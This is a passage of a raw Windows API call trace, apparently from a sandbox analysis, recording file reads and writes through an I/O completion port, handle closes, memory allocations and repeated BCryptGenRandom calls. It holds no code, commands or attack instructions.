lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.656] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x9b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.656] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.739] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2734, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.740] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.740] CloseHandle (hObject=0x2a8) returned 1 [0177.740] free (_Block=0x1ff1e60) [0177.740] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.742] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x634, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0177.742] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.743] CloseHandle (hObject=0x338) returned 1 [0177.743] free (_Block=0x3df0008) [0177.743] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.792] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0177.792] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.809] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x326, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0177.810] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.810] CloseHandle (hObject=0x338) returned 1 [0177.810] free (_Block=0x3df0008) [0177.810] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.846] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x470, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.846] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.846] CloseHandle (hObject=0x2a4) returned 1 [0177.846] free (_Block=0x1ff1e60) [0177.846] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.871] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x13c4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0177.872] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.873] CloseHandle (hObject=0x2a4) returned 1 [0177.873] free (_Block=0x3df0008) [0177.873] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.896] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.896] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.896] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0177.896] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.897] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0177.897] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.897] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.897] free (_Block=0x3e305b8) [0177.897] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.897] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.898] free (_Block=0x1fa91d0) [0177.898] free (_Block=0x1fa2ed8) [0177.898] free (_Block=0x1fa90b8) [0177.898] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0177.898] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.904] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3390, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0177.904] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.906] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xcf0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.906] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.943] CloseHandle (hObject=0x2a8) returned 1 [0177.944] free (_Block=0x3d70450) [0177.944] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.993] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xbde2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0177.995] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.995] CloseHandle (hObject=0x2a8) returned 1 [0177.995] free (_Block=0x3df0008) [0177.995] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0178.408] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1d5e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0178.411] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0178.412] CloseHandle (hObject=0x338) returned 1 [0178.412] free (_Block=0x1ff1e60) [0178.412] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0178.504] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x243c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0178.537] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0178.537] CloseHandle (hObject=0x2a8) returned 1 [0178.538] free (_Block=0x3df0008) [0178.538] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0178.539] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x175a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0178.584] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0178.585] CloseHandle (hObject=0x338) returned 1 [0178.585] free (_Block=0x1ff1e60) [0178.585] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0178.626] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1c12, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0178.781] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0178.781] CloseHandle (hObject=0x2a8) returned 1 [0178.782] free (_Block=0x3df0008) [0178.782] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0178.784] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1224, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0179.303] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.311] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.311] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0179.311] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.312] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0179.312] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.312] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.312] free (_Block=0x3e305b8) [0179.312] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.312] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.313] free (_Block=0x1fa91d0) [0179.313] free (_Block=0x1fa2ed8) [0179.313] free (_Block=0x1fa90b8) [0179.313] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0179.313] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.331] CloseHandle (hObject=0x2a8) returned 1 [0179.331] free (_Block=0x3df0008) [0179.331] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.341] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.342] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0179.342] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.342] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0179.343] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.343] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.343] free (_Block=0x3e305b8) [0179.343] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.343] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.343] free (_Block=0x1fa91d0) [0179.343] free (_Block=0x1fa2ed8) [0179.343] free (_Block=0x1fa90b8) [0179.344] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0179.345] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.358] CloseHandle (hObject=0x308) returned 1 [0179.358] free (_Block=0x3f70048) [0179.358] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.370] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xf74, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0179.371] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.374] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x15bc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0179.374] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.375] CloseHandle (hObject=0x3cc) returned 1 [0179.375] free (_Block=0x3e70008) [0179.375] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.397] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.398] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.398] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0179.398] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.398] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.398] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0179.398] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.399] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.399] free (_Block=0x3e305b8) [0179.399] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.399] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.399] free (_Block=0x1fa91d0) [0179.399] free (_Block=0x1fa2ed8) [0179.399] free (_Block=0x1fa90b8) [0179.399] WriteFile (in: hFile=0x308, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0179.400] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.401] WriteFile (in: hFile=0x308, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x1db0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0179.401] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.466] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xf72, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0179.466] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.483] CloseHandle (hObject=0x308) returned 1 [0179.484] free (_Block=0x1ff1e60) [0179.484] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.503] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x9d2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0179.503] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.509] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x240, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0179.509] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.516] WriteFile (in: hFile=0x338, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x670, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0179.516] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.522] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x4e02, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0179.534] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.537] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.537] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.537] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0179.537] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.538] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0179.538] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.538] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.538] free (_Block=0x3e305b8) [0179.538] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.538] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.538] free (_Block=0x1fa91d0) [0179.538] free (_Block=0x1fa2ed8) [0179.538] free (_Block=0x1fa90b8) [0179.538] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0179.539] GetQueuedCompletionStatus 